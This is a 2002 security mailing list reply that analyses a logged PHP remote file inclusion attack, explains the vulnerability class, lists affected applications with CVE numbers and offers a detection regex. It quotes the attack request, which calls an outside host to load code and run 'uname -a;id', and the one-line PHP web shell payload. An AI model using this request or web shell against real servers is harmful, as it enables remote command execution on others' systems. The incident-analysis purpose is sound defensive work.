Security Incidents mailing list archives

Re: Good practicle php attack example

From: "Steven M. Christey" <coley () linus mitre org>
Date: Wed, 18 Sep 2002 22:49:26 -0400 (EDT)


zeno <bugtraq () cgisecurity net> said:

I figured a few people may find this interesting.


200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET 
/index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id HTTP/1.0" 404 2656 "-" "Mozilla/4.0 
(compatible; MSIE 6.0; Windows 98; Q312461)"

contents of www.jtecx.hpg.com.br/jtec.txt

------------------- start snip

<?php 
system($cmd); 
?>

------------------- end snip


A number of PHP scripts have demonstrated this type of vulnerability,
which was documented in "A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP Applications" by Shaun Clowes; see
http://www.securereality.com.au/studyinscarlet.txt
(http://www.zend.com/zend/art/art-oertli.php also looks useful).  This
has been a topic of discussion on the webappsec list.

Basically, PHP can allow the programmer to access files from remote
sites.  PHP scripts that don't properly filter arguments to an
"include" command can have a remote URL injected by the attacker.  PHP
also allows you to define variables as a parameter (field) into the
script.  The combination of these factors makes it easy for an
attacker to execute code in the vulnerable application.  Note: this
may be dependent on configuration and/or the PHP version.

Some vulnerable applications are:


  BUGTRAQ:20001125 Security problems with TWIG webmail system
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=97535137010910&w=2
  (CVE: CVE-2000-1166)

  BUGTRAQ:20020116 PHP-Nuke allows Command Execution & Much more
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=101121913914205&w=2
  (CVE: CAN-2002-0206)

  [this could be the vulnerability being exploited in zeno's example]

  BUGTRAQ:20020506 b2 php remote command execution
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102069726727513&w=2
  (CVE: CAN-2002-0734)

  BUGTRAQ:20020517 Phorum 3.3.2a remote command execution
  URL:http://marc.theaimsgroup.com/?l=bugtraq&m=102167071314746&w=2
  (CVE: CAN-2002-0764)


A generic Perl regular expression to catch some of these exploits is:

  /\.php[2-9]?\?.*=http:\/\//

This seems to do a good job, although it could generate some false
positives for valid PHP scripts that pass URLs as arguments, e.g. for
redirecting the user out of the site.

- Steve

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

Good practicle php attack example zeno (Sep 17)
- Re: Good practicle php attack example Harald Finnaas (Sep 18)
- <Possible follow-ups>
- Re: Good practicle php attack example Steven M. Christey (Sep 19)
- Re: Good practicle php attack example Steven M. Christey (Sep 22)